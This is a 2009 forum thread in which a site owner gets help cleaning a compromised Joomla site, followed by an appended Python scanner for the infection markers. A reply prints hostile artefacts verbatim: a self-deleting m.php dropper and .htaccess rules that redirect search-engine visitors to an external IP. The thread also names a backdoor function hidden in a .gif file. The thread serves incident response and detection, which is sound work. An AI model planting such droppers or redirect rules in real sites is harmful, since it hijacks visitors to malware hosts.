
dpw

Topic # 30877 24-Feb-2009 14:59

Hi folks,

Please excuse me if this message sounds curt in any way. I am getting horribly frustrated with PHP and Joomla, most probably due to my lack of knowledge in the subject matters. It's doing my head in!

It seems one of the sites I created a few years ago has been compromised. There is now an obfuscated JavaScript snippet at the bottom of each page. I have no idea where this snippet is coming from, but some AV software reports it as a Trojan. I'm guessing this links to some malware site somewhere.

The website in question - www.bernesemountaindog.co.nz - has just been upgraded with a full set of 1.0.15 files. I exported the DB through phpMyAdmin and a scan through the generated SQL revealed no similar content in the DB. I had a look at the template's index.php and nothing there either. I don't know Joomla or PHP well enough to look further, unfortunately.

I am posting it in this forum for lack of a more appropriate-sounding one. Please folks - I'm sure there are some PHP or Joomla gurus out there. Any assistance would be greatly appreciated!

Cheers,
Dany.




Android user, software developer, a semi-typical (not a gamer) geek, and a Bernese Mountain Dog nut!

http://savitarbernese.com | https://nz.linkedin.com/in/danywu

Reply # 197762 24-Feb-2009 15:41

You have a problem: your website has been injected with the Yahoo counter script.

Look for the following line in your pages, which is the beginning of the script:

script language=javascript><!-- Yahoo! Counter starts

Also I would recommend taking the website down as it will infect your website visitors.

There are a number of ways to fix it; you can google "script language=javascript><!-- Yahoo! Counter starts".

What I would recommend is the following:

1) Take the website down (you can set it to offline in Joomla).
2) Copy all the files to your PC at home.
3) Run a search on all files for the script (I think it mainly infects index.*, home.* and default.* files, but I may be wrong on this one).
4) Remove all the script injections from all the files (note which files you have modified).
5) Re-upload the files back to the server.
6) Change the permission on the files you modified above to 644.

I hope this will help. Also, if the files are executable like script files, you may need to set them to 744.



dpw

Reply # 197764 24-Feb-2009 15:53

This is what's bugging me - I've searched with a couple of tools but nothing was returned. I have taken the site down for now and yes, I have already downloaded a copy of the site and its DB.

I'm about to do another search through the files. Just to confirm, this command, executed from the root of the site's folder:

grep -R "Yahoo! Counter" *

should look for what I want, right?

D.

Reply # 197773 24-Feb-2009 16:44

Yep, if you're running Linux, grep -R "Yahoo! Counter" * should do the job, or even:
grep -R "Yahoo" ./*

Well, earlier I had a look at the source of your main page just by going "View Source" in Firefox and I could see the script at the bottom.

Who is your webhost?

Also, the other option is to do a diff between your files and a clean Joomla download.

Also have a look in your webhosting folder for the following files:

m.php

<?php
// renames the staged "ht" file into place as .htaccess, then deletes itself
rename("ht", ".htaccess");
unlink("m.php");
echo "OK";

and ht

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*oogle.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ahoo.*$ [NC]
RewriteRule .* http://87.248.180.89/topic.html?s=s [R,L]

I think they might also have something to do with it.

If you find them, just rename them and see if it will fix your problem.


dpw

Reply # 197820 24-Feb-2009 19:42

Thanks, I can't find the file m.php anywhere, and I'm not using .htaccess in my folders - everything is probably inherited from the parent directory. Are you suggesting I should create one with that content?

My webhost is kiwihosting.net.

Reply # 197874 24-Feb-2009 22:54

No, no, no, no, do not create one, as this is an example of a hacked one, because one of my Joomla websites has been injected with JavaScript and that was one of the things I found during my investigation.

Reply # 198086 25-Feb-2009 20:54

Hi

Can't be much help, sorry, but if you have not already, then the Joomla security thread is a good read (for 1.0.15):

http://forum.joomla.org/viewforum.php?f=267

esp. the security checklist.

...but in the spirit of TRYING to help, you might find some more info here (or try a search in the Joomla forums - there appears to be a bit there):

http://forum.joomla.org/viewtopic.php?p=1581519

Thanks for the heads-up though, I'm off to check my Joomla sites.

Cheers

Reply # 198212 26-Feb-2009 13:11

Here is the final solution which seems to fix this issue:

1) Download your website to your computer.
2) Restore the .htaccess file to the original one from the original install or, if you are not using it, just delete it or delete everything from it.
3) Do a search through your website files for the following code: if(!function_exists('tmp_lkojfghx'))…
A good program to do it is WinGrep. This code can be in any file or can be in a separate file. In the website this post is referring to, it was found in the submenu-on1.gif file; this file was containing only one function.
4) Remove that function from your code, or remove the file if it is in a separate file.
5) Re-upload your new .htaccess file and any other files you have modified.

That should fix it.

Good luck.


dpw

Reply # 198215 26-Feb-2009 13:27

Thanks Casper - that has fixed it for now. I'll be interested in hearing how the code in a gif-suffixed file gets executed though!

D.
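A defender-side scanner for the markers this thread names, added here as an example and not code from the thread or from Joomla: it flags the "Yahoo! Counter starts" snippet, the tmp_lkojfghx function, a referer-conditional redirect in .htaccess or the staged "ht" copy, and, more generally than the thread, any PHP open tag inside a file served as a static asset such as a .gif (PHP's include() and require() execute whatever file they are pointed at, regardless of its extension). The sample site tree it builds is constructed for this example and the redirect target is a TEST-NET address, not the one quoted above.

```python
import os
import re
import tempfile

YAHOO_MARKER = re.compile(r"<!--\s*Yahoo! Counter starts", re.I)
BACKDOOR_FUNC = re.compile(r"function_exists\(\s*['\"\u2019]tmp_lkojfghx")
REFERER_REDIRECT = re.compile(r"RewriteCond\s+%\{HTTP_REFERER\}[\s\S]*?RewriteRule\s+\S+\s+https?://", re.I)
PHP_EXTENSIONS = {".php", ".phtml", ".inc", ".html", ".htm", ".tpl"}
HTACCESS_NAMES = {".htaccess", "ht"}  # "ht" is the staged copy that the m.php dropper renames into place

def classify(path, text):
    """Return the list of findings for one file; an empty list means nothing suspicious."""
    name = os.path.basename(path)
    ext = os.path.splitext(name)[1].lower()
    checks = [
        ("yahoo-counter-js", YAHOO_MARKER.search(text)),
        ("tmp_lkojfghx-backdoor", BACKDOOR_FUNC.search(text)),
        # a PHP open tag inside a static asset such as a .gif is the hiding spot found in the thread
        ("php-code-in-static-file", "<?php" in text and ext not in PHP_EXTENSIONS and name not in HTACCESS_NAMES),
        ("referer-conditional-redirect", name in HTACCESS_NAMES and bool(REFERER_REDIRECT.search(text))),
    ]
    return [label for label, hit in checks if hit]

def scan_tree(root):
    """Walk a downloaded copy of the site; map relative path -> findings, hits only."""
    hits = {}
    for dirpath, _, files in os.walk(root):
        for fname in files:
            full = os.path.join(dirpath, fname)
            with open(full, encoding="utf-8", errors="replace") as fh:
                found = classify(full, fh.read())
            if found:
                hits[os.path.relpath(full, root)] = found
    return hits

def build_sample_site():
    """Constructed sample tree (not the real site) mirroring the thread; redirect target is a TEST-NET address."""
    root = tempfile.mkdtemp(prefix="joomla-sample-")
    files = {
        "index.php": "<?php echo 'clean page'; ?>\n",
        "templates/t/index.php": "</body>\n<script language=javascript><!-- Yahoo! Counter starts\n",
        "images/submenu-on1.gif": "<?php if(!function_exists('tmp_lkojfghx')){ /* payload */ } ?>",
        "ht": "RewriteEngine On\nRewriteCond %{HTTP_REFERER} .*oogle.*$ [NC]\nRewriteRule .* http://198.51.100.7/topic.html [R,L]\n",
    }
    for rel, body in files.items():
        os.makedirs(os.path.dirname(os.path.join(root, rel)), exist_ok=True)
        with open(os.path.join(root, rel), "w") as fh:
            fh.write(body)
    return root
```

Run scan_tree() against the downloaded copy of a site; on the constructed tree it reports the template, the .gif and the "ht" file and leaves the clean index.php alone.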
